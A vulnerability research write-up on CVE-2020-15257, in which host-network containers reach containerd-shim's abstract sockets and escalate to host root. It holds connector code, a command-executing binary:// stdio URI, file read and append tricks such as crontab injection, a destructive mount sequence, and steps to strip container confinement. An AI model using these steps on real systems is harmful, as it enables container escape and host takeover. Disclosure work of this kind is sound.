[This was originally posted at https://research.nccgroup.com/2020/12/10/abstract-shimmer-cve-2020-15257-host-networking-is-root-equivalent-again/.]
This post is a technical discussion of the underlying vulnerability of CVE-2020-15257, and how it can be exploited. Our technical advisory on this issue is available here, but this post goes much further into the process that led to finding the issue, the practicalities of exploiting the vulnerability itself, various complications around fixing the issue, and some final thoughts.
Background
During an assessment a while back, I found an issue that enabled running
arbitrary code in a Docker container that was running with host networking
(e.g. --network=host). Normally, this is pretty bad, because with Docker’s
default capabilities, host networking enables listening in on all traffic and
sending raw packets from arbitrary interfaces. But on the given system, there
wasn’t a ton of attack surface; all traffic was encrypted directly to processes
without load balancers and the only interesting attack seemed to be using raw
packets to handshake with Let’s Encrypt and mint TLS certificates.
Sometime later, I started to think about it again and I noticed something when
when running a netstat command while in a host network Docker container:
# netstat -xlp
Active UNIX domain sockets (only servers)
Proto RefCnt Flags Type State I-Node PID/Program name Path
...
unix 2 [ ACC ] STREAM LISTENING 178355 - /var/snap/lxd/common/lxd/unix.socket
...
unix 2 [ ACC ] STREAM LISTENING 21723 - /run/containerd/containerd.sock.ttrpc
unix 2 [ ACC ] STREAM LISTENING 21725 - /run/containerd/containerd.sock
unix 2 [ ACC ] STREAM LISTENING 21780 - /var/run/docker/metrics.sock
unix 2 [ ACC ] STREAM LISTENING 14309 - /run/systemd/journal/io.systemd.journal
unix 2 [ ACC ] STREAM LISTENING 23321 - /var/run/docker/libnetwork/496e19fa620c.sock
unix 2 [ ACC ] STREAM LISTENING 18640 - /run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 305835 - @/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock@
...
unix 2 [ ACC ] STREAM LISTENING 18645 - /run/docker.sock
...
As a refresher, normal Unix domain sockets are bound to a file path, but Linux
supports “abstract namespace” Unix domain sockets that do not exist on the
filesystem. These abstract Unix sockets are created in much the same way as
normal Unix sockets, using a sockaddr_un struct:
struct sockaddr_un {
sa_family_t sun_family; /* AF_UNIX */
char sun_path[108]; /* Pathname */
};
While normal pathed Unix sockets use a sun_path containing a
NUL-terminated C string, abstract Unix sockets’ sun_path begins with a
null byte and can contain arbitrary binary content; their length is
actually based on the size passed in to the bind(2) syscall, which can
be less than the size of the sockaddr_un struct. The initial null byte
in an abstract Unix socket is generally represented with an @ sign when
printed.
Pathed Unix domain sockets can only be connect(2)-ed to through the
filesystem, and therefore host rootfs-bound pathed Unix sockets cannot
generally be accessed from a container with a pivot_root(2)-ed rootfs.
However, abstract namespace Unix domain sockets are tied to network
namespaces.
Note: Oddly enough, even though access isn’t tied to the network
namespace a process is associated with, /proc/net/unix (which is what the
above netstat command read from to obtain its output) lists pathed Unix
sockets based on the network namespace they were bound from.
In the above netstat output, we can clearly see a bunch of pathed Unix
sockets related to container runtimes, e.g. LXD, Docker, and containerd. But we
also see an abstract Unix socket in the form of /containerd-shim/<id>.sock.
One of these appears for each Docker container that is running on a given
system.
Unlike pathed Unix sockets which have base access control checks applied based
on their Unix file permissions, abstract Unix sockets have no built-in access
controls, and must validate connections dynamically via pulling ancillary data
with recvmsg(2) (this is also how Unix sockets can pass file descriptors
between processes). So we try to connect(2) and…
# socat abstract-connect:/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock -
... socat[15] E connect(5, AF=1 "\0/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock", 89): Connection refused
“Connection refused.” So my first assumption was that, whatever this thing is, it’s validating incoming connections somehow. Perhaps it only accepts one connection at a time?
containerd-shim
Reading a bit about the architecture of Docker and containerd,1 which was
spun out of Docker, we find that containerd-shim is the direct parent of a
container’s init process. This is easily observed with the following commands
run from the host:
# netstat -xlp | grep shim
unix 2 [ ACC ] STREAM LISTENING 348524 29533/containerd-sh @/containerd-shim/....sock@
# pstree -Tspn 29533
systemd(1)───containerd(733)───containerd-shim(29533)───sh(29550)
So how does this thing get set up in the first place? The relevant code is
part of the main containerd daemon, runtime/v1/shim/client/client.go:2
func WithStart(binary, address, daemonAddress, cgroup string, debug bool, exitHandler func()) Opt {
return func(ctx context.Context, config shim.Config) (_ shimapi.ShimService, _ io.Closer, err error) {
socket, err := newSocket(address)
if err != nil {
return nil, nil, err
}
defer socket.Close()
f, err := socket.File()
...
cmd, err := newCommand(binary, daemonAddress, debug, config, f, stdoutLog, stderrLog)
if err != nil {
return nil, nil, err
}
if err := cmd.Start(); err != nil {
return nil, nil, errors.Wrapf(err, "failed to start shim")
}
...
func newCommand(binary, daemonAddress string, debug bool, config shim.Config, socket *os.File, stdout, stderr io.Writer) (*exec.Cmd, error) {
selfExe, err := os.Executable()
if err != nil {
return nil, err
}
args := []string{
"-namespace", config.Namespace,
"-workdir", config.WorkDir,
"-address", daemonAddress,
"-containerd-binary", selfExe,
}
...
cmd := exec.Command(binary, args...)
...
cmd.ExtraFiles = append(cmd.ExtraFiles, socket)
cmd.Env = append(os.Environ(), "GOMAXPROCS=2")
...
func newSocket(address string) (*net.UnixListener, error) {
if len(address) > 106 {
return nil, errors.Errorf("%q: unix socket path too long (> 106)", address)
}
l, err := net.Listen("unix", "\x00"+address)
In short, the functor returned from WithStart() creates an abstract Unix
socket from a provided address using newSocket(). It then extracts the raw
file descriptor from it and passes it directly to the child containerd-shim
process it starts with newCommand(). We can confirm that this is the code
creating our observed containerd-shim process by the the command line
arguments and environment variables it passes to the child:
# ps -q 29533 -o command= | cat
containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/75aa678979e7f94411ab7a5e08e773fe5dff26a8852f59b3f60de48e96e32afc -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
# cat /proc/29533/environ | grep -a -E -o 'GOMAXPROCS=[0-9]+'
GOMAXPROCS=2
So what now? Well, we can confirm the behavior of the containerd-shim binary
with respect to how it listens on the abstract Unix socket. The relevant code
is within cmd/containerd-shim/main_unix.go:3
func serve(ctx context.Context, server *ttrpc.Server, path string) error {
var (
l net.Listener
err error
)
if path == "" {
f := os.NewFile(3, "socket")
l, err = net.FileListener(f)
f.Close()
path = "[inherited from parent]"
} else {
if len(path) > 106 {
return errors.Errorf("%q: unix socket path too long (> 106)", path)
}
l, err = net.Listen("unix", "\x00"+path)
}
Because my suspicion was that only the first connection to this socket is
accepted, it would seem that there is a race condition in the above snippets
whereby an attacker could list out the abstract namespace “path” before
the containerd-shim process is even spawned and hammer it for connections
to get the first accept(2) from containerd-shim. I then made a modified
version of the code that starts containerd-shim so that it could be tested
in isolation.
package main
import (
"net"
"io"
"github.com/pkg/errors"
"fmt"
"os"
"os/exec"
"syscall"
)
func newSocket(address string) (*net.UnixListener, error) {
if len(address) > 106 {
return nil, errors.Errorf("%q: unix socket path too long (> 106)", address)
}
l, err := net.Listen("unix", "\x00"+address)
if err != nil {
return nil, errors.Wrapf(err, "failed to listen to abstract unix socket %q", address)
}
return l.(*net.UnixListener), nil
}
func newCommand(socket *os.File, stdout, stderr io.Writer) (*exec.Cmd, error) {
args := []string{
"-namespace", "moby",
"-workdir", "/var/lib/containerd/io.containerd.runtime.v1.linux/moby/yolo",
"-address", "/run/containerd/containerd.sock",
"-containerd-binary", "/usr/bin/containerd",
"-runtime-root", "/var/run/docker/runtime-runc",
"-debug",
}
cmd := exec.Command("/usr/bin/containerd-shim", args...)
cmd.Dir = "/run/containerd/io.containerd.runtime.v1.linux/moby/yolo"
cmd.SysProcAttr = &syscall.SysProcAttr{
Setpgid: true,
}
cmd.ExtraFiles = append(cmd.ExtraFiles, socket)
cmd.Env = append(os.Environ(), "GOMAXPROCS=2")
cmd.Stdout = stdout
cmd.Stderr = stderr
return cmd, nil
}
func main() {
socket, err := newSocket("yoloshim")
if err != nil {
fmt.Printf("err: %s\n", err)
return
}
defer socket.Close()
f, err := socket.File()
if err != nil {
fmt.Printf("failed to get fd for socket\n")
return
}
defer f.Close()
stdoutLog, err := os.Create("/tmp/shim-stdout.log.txt")
stderrLog, err := os.Create("/tmp/shim-stderr.log.txt")
defer stdoutLog.Close()
defer stderrLog.Close()
cmd, err := newCommand(f, stdoutLog, stderrLog)
if err != nil {
fmt.Printf("err: %s\n", err)
return
}
if err := cmd.Start(); err != nil {
fmt.Printf("failed to start shim: %s\n", err)
return
}
defer func() {
if err != nil {
cmd.Process.Kill()
}
}()
go func() {
cmd.Wait()
if stdoutLog != nil {
stdoutLog.Close()
}
if stderrLog != nil {
stderrLog.Close()
}
}()
}
Separately, I also wrote some code to connect to the containerd-shim socket:
package main
import (
"os"
"context"
"fmt"
"time"
"github.com/containerd/containerd/pkg/dialer"
"github.com/containerd/ttrpc"
shimapi "github.com/containerd/containerd/runtime/v1/shim/v1"
ptypes "github.com/gogo/protobuf/types"
)
func main() {
ctx := context.Background()
socket := os.Args[1]
conn, err := dialer.Dialer("\x00"+socket, 5*time.Second)
if err != nil {
fmt.Printf("failed to connect: %s\n", err)
return
}
client := ttrpc.NewClient(conn, ttrpc.WithOnClose(func() {
fmt.Printf("connection closed\n")
}))
c := shimapi.NewShimClient(client)
var empty = &ptypes.Empty{}
info, err := c.ShimInfo(ctx, empty)
if err != nil {
fmt.Printf("err: %s\n", err)
return
}
fmt.Printf("info.ShimPid: %d\n", info.ShimPid)
}
So we run it and then try to connect to the containerd-shim socket we
created…
# mkdir -p /run/containerd/io.containerd.runtime.v1.linux/moby/yolo
# mkdir -p /var/lib/containerd/io.containerd.runtime.v1.linux/moby/yolo/
# ./startshim
# ./connectortest yoloshim
info.ShimPid: 12866
And that seems to work. For good measure, we’ll get rid of this
containerd-shim, start another one, and try socat again:
# socat ABSTRACT-CONNECT:yoloshim -
... socat[12890] E connect(5, AF=1 "\0yoloshim", 11): Connection refused
It fails, again. But our connection test code works:
# ./connectortest yoloshim
info.ShimPid: 13737
So what’s going on? Let’s see what the test code is actually doing:
# strace -e socat ABSTRACT-CONNECT:yoloshim -
...
socket(AF_UNIX, SOCK_STREAM, 0) = 5
connect(5, {sa_family=AF_UNIX, sun_path=@"yoloshim"}, 11) = -1 ECONNREFUSED (Connection refused)
...
# strace -f -x ./connectortest yoloshim
execve("./connectortest", ["./connectortest", "yoloshim"], 0x7ffdb4ce9e98 /* 18 vars */) = 0
...
[pid 13842] socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
[pid 13842] setsockopt(3, SOL_SOCKET, SO_BROADCAST, [1], 4) = 0
[pid 13842] connect(3, {sa_family=AF_UNIX, sun_path=@"yoloshim\0"}, 12) = 0
...
[pid 13842] write(3, "\0\0\0001\0\0\0\1\1\0\n%containerd.runtime.l"..., 59) = 59
...
[pid 13844] read(3, "\0\0\0\5\0\0\0\1\2\0\22\3\10\251k", 4096) = 15
...
[pid 13842] write(1, "info.ShimPid: 13737\n", 20info.ShimPid: 13737
) = 20
[pid 13842] exit_group(0 <unfinished ...>
...
+++ exited with 0 +++
Looking closely, it appears that when the Go code connects, it embeds a null byte within the abstract Unix domain socket “path.” Digging into Go’s internals, it appears that Go does know how to handle abstract paths:4
func (sa *SockaddrUnix) sockaddr() (unsafe.Pointer, _Socklen, error) {
name := sa.Name
n := len(name)
...
sl := _Socklen(2)
if n > 0 {
sl += _Socklen(n) + 1
}
if sa.raw.Path[0] == '@' {
sa.raw.Path[0] = 0
// Don't count trailing NUL for abstract address.
sl--
}
However, this is arguably the wrong behavior as abstract Unix sockets can
start with a literal @ sign, and this implementation would prevent idiomatic
Go from ever connect(2)-ing (or bind(2)-ing) to them. Regardless, because
containerd embeds a raw \x00 at the start of the address, Go’s internals
keep the null byte at the end. If you look all the way at the top of this post,
you’ll see that there is, in fact, a second @ at the end of the
containerd-shim socket. And I probably should have noticed it; it’s
definitely a bit more obvious with our test socket:
# netstat -xlp | grep yolo
unix 2 [ ACC ] STREAM LISTENING 93884 13737/containerd-sh @yoloshim@
But our initial test case would have failed anyway. socat doesn’t have a
direct means of supporting arbitrary binary in abstract Unix domain socket
“paths.” You can emulate some of it with something like the following:
# socat "$(echo -en 'ABSTRACT-CONNECT:yoloshim\x01')" -
... socat[15094] E connect(5, AF=1 "\0yoloshim\x01", 12): Connection refused
But because POSIX is built around NUL-terminated C strings, the same cannot be
done for null bytes, as they will fail to pass through execve(2):
# socat "$(echo -en 'ABSTRACT-CONNECT:yoloshim\x00')" -
... socat[15099] E connect(5, AF=1 "\0yoloshim", 11): Connection refused
This is actually an issue we ran into when writing unixdump, a
tcpdump-alike for Unix sockets. As a workaround, we added the -@
flag5 that tells unixdump to parse the socket argument as base64,
specifically so that null bytes and arbitrary binary could be used. Basically,
this is something I definitely should have recognized the first time.
Now having a connection testing binary, we can relatively easily test if a host
network namespace container can connect to our containerd-shim or a real one:
$ docker run -it --network host --userns host -v /mnt/hgfs/go/connector/connectortest:/connectortest:ro ubuntu:18.04 /bin/sh
# /connectortest yoloshim
info.ShimPid: 13737
# cat /proc/net/unix | grep shim
0000000000000000: 00000002 00000000 00010000 0001 01 93884 @yoloshim@
0000000000000000: 00000002 00000000 00010000 0001 01 114224 @/containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock@
0000000000000000: 00000003 00000000 00000000 0001 03 115132 @/containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock@
# /connectortest /containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock
info.ShimPid: 15471
And it can, and that’s bad. But what is the underlying reason that we are able
to connect in the first place? Looking at the containerd-shim code that
starts the service, we see that it sets up a ttrpc “handshaker”
with ttrpc.UnixSocketRequireSameUser():6
func newServer() (*ttrpc.Server, error) {
return ttrpc.NewServer(ttrpc.WithServerHandshaker(ttrpc.UnixSocketRequireSameUser()))
}
For reference, ttrpc is containerd’s custom gRPC implementation that uses a
custom wire protocol not based on TLS/HTTP/H2 and focuses on supporting
embedded environments. The implementation of
ttrpc.UnixSocketRequireSameUser() is shown below:7
// UnixSocketRequireUidGid requires specific *effective* UID/GID, rather than the real UID/GID.
//
// For example, if a daemon binary is owned by the root (UID 0) with SUID bit but running as an
// unprivileged user (UID 1001), the effective UID becomes 0, and the real UID becomes 1001.
// So calling this function with uid=0 allows a connection from effective UID 0 but rejects
// a connection from effective UID 1001.
//
// See socket(7), SO_PEERCRED: "The returned credentials are those that were in effect at the time of the call to connect(2) or socketpair(2)."
func UnixSocketRequireUidGid(uid, gid int) UnixCredentialsFunc {
return func(ucred *unix.Ucred) error {
return requireUidGid(ucred, uid, gid)
}
}
...
func UnixSocketRequireSameUser() UnixCredentialsFunc {
euid, egid := os.Geteuid(), os.Getegid()
return UnixSocketRequireUidGid(euid, egid)
}
...
func requireUidGid(ucred *unix.Ucred, uid, gid int) error {
if (uid != -1 && uint32(uid) != ucred.Uid) || (gid != -1 && uint32(gid) != ucred.Gid) {
return errors.Wrap(syscall.EPERM, "ttrpc: invalid credentials")
}
return nil
}
Essentially, the only check performed is that the user connecting is the same
user as the one containerd-shim is running as. In the standard case, this is
root. However, if we are assuming a standard Docker container configuration
with host networking, then we can also assume that the container is not user
namespaced; in fact, neither Docker, nor containerd/runc appear to support the
combination of host networking with user namespaces. Essentially, because root
on the inside of the container is in fact the same root user by UID outside the
container, we can connect to containerd-shim, even without capabilities.
$ docker run -it --network host --userns host -v /mnt/hgfs/go/connector/connectortest:/connectortest:ro --cap-drop ALL ubuntu:18.04 /bin/sh
# /connectortest /containerd-shim/moby/419fa8aca5a8a5edbbdc5595cda9142ca487770616f5a3a2af0edc40cacadf89/shim.sock
info.ShimPid: 3278
So how bad is this actually? Pretty bad as it turns out.
The Fix
But let’s take a slight segue and talk about how this issue was remediated. We first reached out to the containerd project with this advisory (also linked below). Initially, the issue was not accepted as a vulnerability because the project considered host namespacing itself to be an intractable security issue. Needless to say, I disagree with such a notion, but it was also a bit of a red herring, and after some rounds of discussion, the core issue — that containerd creates highly sensitive Unix sockets that are highly exposed — was accepted. It is worth noting that, at one point, one developer claimed that this particular issue was well known, though there does not appear to be any evidence of this being the case (at least in English); if it were, the security community would have likely jumped on the issue long ago, though the null byte quirk may have been misconstrued as an access control check.
Overall, the path to a fix winded through a couple of options before our main recommended fix, switching to pathed Unix domain sockets, was implemented. While some of these other attempts had problems that would have enabled bypasses or opened alternate avenues of attack, I think it’s important to discuss what could have been and what would have gone wrong.
Note: While security practitioners reading this post may think that switching to pathed Unix domain sockets should have been so trivial as not to have required effort to be invested into the potential hardening of abstract sockets, it is worth noting that an implicit assumption of the containerd codebase was that these sockets were essentially garbage collected on container exit. Therefore, because this was not rocket science,8 any attempt to add pathed Unix sockets required a significant amount of cleanup code and non-trivial exit detection logic to invoke it at the right times.
LSM Policies
One of the earliest discussions was on the feasibility of applying AppArmor or
SELinux policies that would prevent access to the abstract containerd sockets.
While recent versions of both AppArmor and SELinux support restricting access
to abstract namespace Unix domain sockets, they are not an ideal fix. As
containerd itself is not generally the component within a containerization
toolchain that creates such LSM policies for containers, any such attempt to
use them for this purpose would have to be implemented by each client of
containerd, or by end-users if they even have the privilege to reconfigure
those policies — which brings a large risk of misconfiguring or accidentally
eliminating the default sets of rules that help to enforce the security model
of containers. Additionally, even for containerd clients such as dockerd it
would be tricky to implement in a clean manner as there would be a
chicken-and-egg problem with attempting to restrict access as the
implementation- and version-specific scheme for containerd’s internal abstract
sockets would need to be hardcoded within the client’s policy generator. While
this could be done for Docker’s native support for AppArmor,9 anyone
attempting to use the legitimate Docker on Red Hat’s distros (e.g. RHEL,
CentOS, Fedora) instead of their also-ran podman would likely remain vulnerable
to this issue. Red Hat’s SELinux ruleset for Docker was only ever a catch-up
playing imitation of the genuine AppArmor policy and it is now likely
unmaintained given their shift in focus to their Docker clone.
Token Authentication
Another proposed fix was to introduce a form of authentication whereby, on connecting to the abstract socket, a client would need to provide a token value to prove its identity. However, the implementation used a single shared token value stored on disk and had no mechanism to prevent or rate-limit would-be clients from simply guessing the token value. While the initial implementation of this scheme had a timing side-channel due to a non-constant time token comparison — which could be heavily abused due to the communication occurring entirely on the same host through Unix sockets, without the overhead of the network stack — and also used a token generation scheme with slight biases, the main issues with this scheme are more operational. In addition to the fact that a protocol change such as this would potentially be so breaking as not to be backported, leaving large swathes of users exposed, it would also kick the can and create a valuable target for an attacker to obtain (i.e. the token) that could re-open the issue.
Mount Namespace Verification
One of the more interesting proposed fixes was a scheme whereby the PID of the
caller could be obtained from the peer process Unix credentials of the socket
accessed using getsockopt(2)’s SOL_SOCKET SO_PEERCRED option. With this
PID, it would be possible to compare raw namespace ID values between the
containerd-shim process on the host and the client process (e.g. via
readlink /proc/<pid>/ns/mnt). While this is definitely a cool way of
validating the execution context of a client, it’s also extremely prone to
race conditions. There is no guarantee that by the time userland code in the
server calls getsockopt(2) (or in the case of a
client’s setsockopt(2) call with SOL_SOCKET and SO_PASSCRED, where the
server receives an ancillary message each time data is sent) and processes on
the Unix credential data, that the client hasn’t passed the socket to a child,
exited, and let another process take its PID. In fact, this is a fairly easy
race to win as the client can wait or create a number of processes for PID
wraparound to begin anew on the host and get close to its PID before exiting.
In general, attempting to determine that the actual process connecting or
sending a message to a Unix socket is the one you think it is was likely
outside the threat model of SO_PEERCRED/SO_PASSCRED/SCM_CREDENTIALS, and
is fraught with danger if the client has UID/GID 0
(or effective CAP_SETUID/CAP_SETGID).
Exploitation
Given that we can talk to the containerd-shim API, what does that actually
get us? Going through the containerd-shim API protobuf,10 we can see
an API similar to Docker:
service Shim {
...
rpc Create(CreateTaskRequest) returns (CreateTaskResponse);
rpc Start(StartRequest) returns (StartResponse);
rpc Delete(google.protobuf.Empty) returns (DeleteResponse);
...
rpc Checkpoint(CheckpointTaskRequest) returns (google.protobuf.Empty);
rpc Kill(KillRequest) returns (google.protobuf.Empty);
rpc Exec(ExecProcessRequest) returns (google.protobuf.Empty);
...
}
While a number of these APIs can do fairly damaging things, the Create() and
Start() APIs are more than enough to compromise a host, but maybe not in the
way you might think. Obviously, if you can start an arbitrary container config
you can run the equivalent of a --privileged container, given that
containerd-shim generally runs as full root. But how are you going to get
such a config file and have containerd-shim load it? Let’s first take a look
at the CreateTaskRequest message passed to Create() and the StartRequest
message passed to Start():
message CreateTaskRequest {
string id = 1;
string bundle = 2;
string runtime = 3;
repeated containerd.types.Mount rootfs = 4;
bool terminal = 5;
string stdin = 6;
string stdout = 7;
string stderr = 8;
string checkpoint = 9;
string parent_checkpoint = 10;
google.protobuf.Any options = 11;
}
message StartRequest {
string id = 1;
}
As we can see from this, the pairing of these calls is very much like
docker create and docker start in that the Start() call simply starts
a container configured by Create(). So what can we do with Create()? A
fair amount as it turns out, but there are some restrictions. For example,
at the start of Create(),11 if any mounts are contained in the
rootfs field, Create() will use the base filepath provided with the
bundle field to create a rootfs directory. As of containerd 1.3.x, if it
cannot create the directory (e.g. because it already exists) Create() will
fail early.
func (s *Service) Create(ctx context.Context, r *shimapi.CreateTaskRequest) (_ *shimapi.CreateTaskResponse, err error) {
var mounts []process.Mount
for _, m := range r.Rootfs {
mounts = append(mounts, process.Mount{
Type: m.Type,
Source: m.Source,
Target: m.Target,
Options: m.Options,
})
}
rootfs := ""
if len(mounts) > 0 {
rootfs = filepath.Join(r.Bundle, "rootfs")
if err := os.Mkdir(rootfs, 0711); err != nil && !os.IsExist(err) {
return nil, err
}
}
...
AIO (Arbitrary Command Execution IO)
The bulk of the work in Create() is handled through a call to
process.Create(ctx, config). The purpose of containerd-shim here is
essentially to serve as a managed layer around runc; for example, the
bundle field is passed directly to runc create --bundle <bundle>, which
will expect it to contain a config.json file with the container config.
However, another interesting facet of this function is how it processes
the stdio fields, stdin, stdout, and stderr with the createIO()
function.12
func createIO(ctx context.Context, id string, ioUID, ioGID int, stdio stdio.Stdio) (*processIO, error) {
pio := &processIO{
stdio: stdio,
}
...
u, err := url.Parse(stdio.Stdout)
if err != nil {
return nil, errors.Wrap(err, "unable to parse stdout uri")
}
if u.Scheme == "" {
u.Scheme = "fifo"
}
pio.uri = u
switch u.Scheme {
case "fifo":
pio.copy = true
pio.io, err = runc.NewPipeIO(ioUID, ioGID, withConditionalIO(stdio))
case "binary":
pio.io, err = NewBinaryIO(ctx, id, u)
case "file":
filePath := u.Path
if err := os.MkdirAll(filepath.Dir(filePath), 0755); err != nil {
return nil, err
}
var f *os.File
f, err = os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
return nil, err
}
f.Close()
pio.stdio.Stdout = filePath
pio.stdio.Stderr = filePath
pio.copy = true
pio.io, err = runc.NewPipeIO(ioUID, ioGID, withConditionalIO(stdio))
...
Since containerd 1.3.0, the containerd-shim Create() API stdio fields can
be URIs that represent things like an IO processing binary that is run
immediately in the context of containerd-shim, outside any form of Linux
namespacing. For example, the general structure of such a URI is the following:
binary:///bin/sh?-c=cat%20/proc/self/status%20>/tmp/foobar
The only restriction is that to run a binary IO processor, the ttrpc
connection must declare a containerd namespace. This is not a Linux namespace
but an identifier used to help containerd to organize operations by client
container runtime. One such way of passing this check is the following:
ctx := context.Background()
md := ttrpc.MD{}
md.Set("containerd-namespace-ttrpc", "notmoby")
ctx = ttrpc.WithMetadata(ctx, md)
conn, err := getSocket()
if err != nil {
fmt.Printf("err: %s\n", err)
return
}
client := ttrpc.NewClient(conn, ttrpc.WithOnClose(func() {
fmt.Printf("connection closed\n")
}))
c := shimapi.NewShimClient(client)
...
However, this is not as much of an interesting payload and it also doesn’t work
with containerd 1.2.x, which is the version used by Docker’s own packaging.
Instead, the underlying stdio implementation for 1.2.x only appears to support
appending to existing files. In contrast, containerd 1.3.0’s file:// URIs
will also create new files (and any necessary directories) if they do not
exist.
Finding Yourself
To perform most of these operations, a valid bundle path must be
passed to Create(). Luckily, there are two means available to us to make such
a thing happen. The first is to use one’s own container’s ID to reference its
legitimate containerd bundle path
(e.g. /run/containerd/io.containerd.runtime.v1.linux/moby/<id>/config.json);
the ID is available within /proc/self/cgroup.
# cat /proc/self/cgroup
12:cpuset:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
11:pids:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
10:devices:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
9:cpu,cpuacct:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
8:net_cls,net_prio:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
7:blkio:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
6:freezer:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
5:hugetlb:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
4:perf_event:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
3:rdma:/
2:memory:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
1:name=systemd:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
0::/system.slice/containerd.service
Note: The config.json file within the bundle directory will contain
the host path to the container’s root filesystem.
The second, which I only learned would be possible after I had written an
exploit based on the first method, is to create a runc bundle configuration
within your own container’s filesystem; the base path for your container’s
filesystem on the host is available from the /etc/mtab file mounted into the
container (thanks @drraid/@0x7674).
# head -n 1 /etc/mtab
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/165536.165536/overlay2/l/EVYWL6E5PMDAS76BQVNOMGHLCA:/var/lib/docker/165536.165536/overlay2/l/WGXNHNVFLLGUXW7AWYAHAZJ3OJ:/var/lib/docker/165536.165536/overlay2/l/MC6M7WQGXRBLA5TRN5FAXRE3HH:/var/lib/docker/165536.165536/overlay2/l/XRVQ7R6RZ7XZ3C3LKQSAZDMFAO:/var/lib/docker/165536.165536/overlay2/l/VC7V4VA5MA3R4Z7ZYCHK5DVETT:/var/lib/docker/165536.165536/overlay2/l/5NBSWKYN7VDADBTD3R2LJRXH3M,upperdir=/var/lib/docker/165536.165536/overlay2/c4f65693109073085e63757644e1576e386ba0854ed1811d307cea22f9406437/diff,workdir=/var/lib/docker/165536.165536/overlay2/c4f65693109073085e63757644e1576e386ba0854ed1811d307cea22f9406437/work,xino=off 0 0
Note: The shared base directory of the upperdir and workdir paths
contains a merged/ subdirectory that is the root of the container filesystem.
Mount Shenanigans (1.2.x)
So, what can we do with this? Well, with the containerd ID for our host network
namespace container, we can re-Create() it from its existing config. In this
situation, an interesting divergence between containerd 1.2.x and 1.3.x
mentioned above is that we can’t pass mounts in for containerd 1.3.x via an
RPC field; however, we can do so with containerd 1.2.x. When mounts are supplied
via RPC fields, they are essentially passed directly to mount(2) without
validation; the only limitation is that the target is always the
/run/containerd/io.containerd.runtime.v1.linux/moby/<id>/rootfs directory.
Additionally, these mount(2)s are performed before any others used to build
the container from the container image. However, it should be noted that
standard Docker containers do not actually use the rootfs directory directly
and are instead based out of directories such as
/var/lib/docker/overlay2/<id>/merged. Due to this, we cannot simply bind
mount(1) "/" to rootfs and expect that a reduced directory image (i.e.
one without /bin) would be able to access the host filesystem. However, we
can perform such a mount(2) and then bind mount(2) additional directories
over that. The end result is that the subsequent binds are then applied to the
host / directory itself through the mount from rootfs. However, this is an
extremely dangerous operation as containerd(-shim)’s final act of running
runc delete will cause the entire rootfs directory to be recursively
removed. As this would now point to / on the host, this would result in the
deletion of the entire filesystem. But if you would not heed the author’s
dire warning, the following snippets may be used to test the issue:
# mkdir -p /tmp/fakeroot/{etc,proc}
# echo "foo" > /tmp/fakeroot/etc/foo
# mkdir -p /tmp/overmount/etc
# echo "bar" > /tmp/overmount/etc/bar
_, err = c.Create(ctx, &shimapi.CreateTaskRequest{
ID: taskId,
Bundle: bundle,
Terminal: false,
Stdin: "/dev/null",
Stdout: "/dev/null",
Stderr: "/dev/null",
Rootfs: []*types.Mount{
{
Type: "none",
Source: "/tmp/fakeroot",
Options: []string{
"rw", "bind",
},
},
{
Type: "none",
Source: "/tmp/overmount",
Options: []string{
"rw", "bind",
},
},
},
})
IO Shenanigans
Going back to containerd-shim’s IO handling, we have a pretty clear arbitrary
file read capability from pointing Stdin to any file we choose. We also have
an arbitrary file write with containerd-shim’s file:// URI support in
1.3.x, and an arbitrary file append in both versions. Given the append-only
restriction, any append modifications to our own config.json are essentially
ignored. Instead, a good target in general is /etc/crontab if the host is
running cron. All you have to do is point Stdout or Stderr at it and then
have your malicious container output a crontab line.
Evil Containers
Given that we can, on containerd 1.3.x, overwrite our own container’s
config.json and create a new container from it, or load a custom
config.json from our own container’s filesystem, what can we do to run a
highly privileged container? First, we should talk about what this
config.json file actually is. It’s an OCI runtime config file13 that
is technically supported by several implementations.
From a privilege escalation perspective, the relevant fields are
process.capabilites.(bounding,effective,inheritable,permitted),
process.(apparmorProfile,selinuxLabel), mounts, linux.namespaces, and
linux.seccomp. From an operational perspective, root.path and
process.(args,env) are the important ones, with root.path being the most
important for us as. Given that it sets the root of the container filesystem
from the perspective of the host, we will need to make sure it will point
somewhere useful (i.e. if we plan to run something from an image). If
“re-using” an existing container’s config.json, such as our own, root.path
can be left untouched; but if loading one from our own container, root.path
would need to be patched up to reference somewhere in our container’s
filesystem. As part of my exploit that overwrites my container’s config.json
file, I use jq to transform its contents (obtained via Stdin) to:
- Remove PID namespacing
- Disable AppArmor (by setting it to “unconfined”)
- Disable Seccomp
- Add all capabilities
